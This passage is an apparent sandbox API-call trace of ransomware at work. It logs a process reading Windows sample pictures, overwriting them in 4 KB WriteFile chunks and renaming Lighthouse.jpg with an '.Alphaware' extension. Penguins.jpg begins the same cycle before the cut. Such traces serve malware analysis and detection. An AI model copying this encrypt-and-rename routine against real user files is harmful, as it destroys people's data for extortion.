"c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23c9360 | out: lpFileInformation=0x23c9360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c)) returned 1 [0102.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0102.060] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", nBufferLength=0x105, lpBuffer=0x23e4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpFilePart=0x0) returned 0x37 [0102.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0102.060] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0102.061] GetFileType (hFile=0x260) returned 0x1 [0102.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0102.061] GetFileType (hFile=0x260) returned 0x1 [0102.061] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x8907c [0102.067] ReadFile (in: hFile=0x260, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x8907c, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23ea98*=0x8907c, lpOverlapped=0x0) returned 1 [0102.079] CloseHandle (hObject=0x260) returned 1 [0102.278] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", nBufferLength=0x105, lpBuffer=0x23e400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpFilePart=0x0) returned 0x37 [0102.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0102.278] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0102.285] GetFileType (hFile=0x260) returned 0x1 [0102.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0102.285] GetFileType (hFile=0x260) returned 0x1 [0102.285] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.287] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.287] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.287] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.288] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.288] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.289] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.289] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.289] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.290] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.290] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.290] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.291] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.291] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.291] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.292] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.292] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.292] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.293] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.293] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.293] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.294] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.294] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.294] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.295] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.295] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.295] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.295] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.296] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.296] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.296] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.297] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.297] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.297] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.297] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.298] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.298] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.298] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.299] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.299] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.299] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.300] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.300] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.300] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.301] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.301] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.301] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.301] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.302] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.302] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.302] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.303] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.303] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.303] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.304] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.304] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.304] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.304] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.305] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.305] WriteFile (in: hFile=0x260, lpBuffer=0x23c5920*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5920*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0102.321] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f2c5920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xb6c20)) returned 1 [0102.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0102.321] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.alphaware")) returned 1 [0102.333] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", dwFileAttributes=0x80) returned 1 [0102.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0102.334] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23c6e00 | out: lpFileInformation=0x23c6e00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b)) returned 1 [0102.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0102.334] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", nBufferLength=0x105, lpBuffer=0x23e4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpFilePart=0x0) returned 0x35 [0102.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0102.335] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0102.335] GetFileType (hFile=0x260) returned 0x1 [0102.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0102.335] GetFileType (hFile=0x260) returned 0x1 [0102.335] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0xbde6b [0102.335] ReadFile (in: hFile=0x260, lpBuffer=0x12ae4800, nNumberOfBytesToRead=0xbde6b, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12ae4800*, lpNumberOfBytesRead=0x23ea98*=0xbde6b, lpOverlapped=0x0) returned 1 [0102.345] CloseHandle (hObject=0x260) returned 1 [0102.393] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", nBufferLength=0x105, lpBuffer=0x23e400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpFilePart=0x0) returned 0x35 [0102.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0102.393] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0102.401] GetFileType (hFile=0x260) returned 0x1 [0102.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0102.401] GetFileType (hFile=0x260) returned 0x1 [0102.402] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.403] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.403] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.404] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.404] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.404] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.404] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.405] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.405] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.405] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.405] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.406] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, 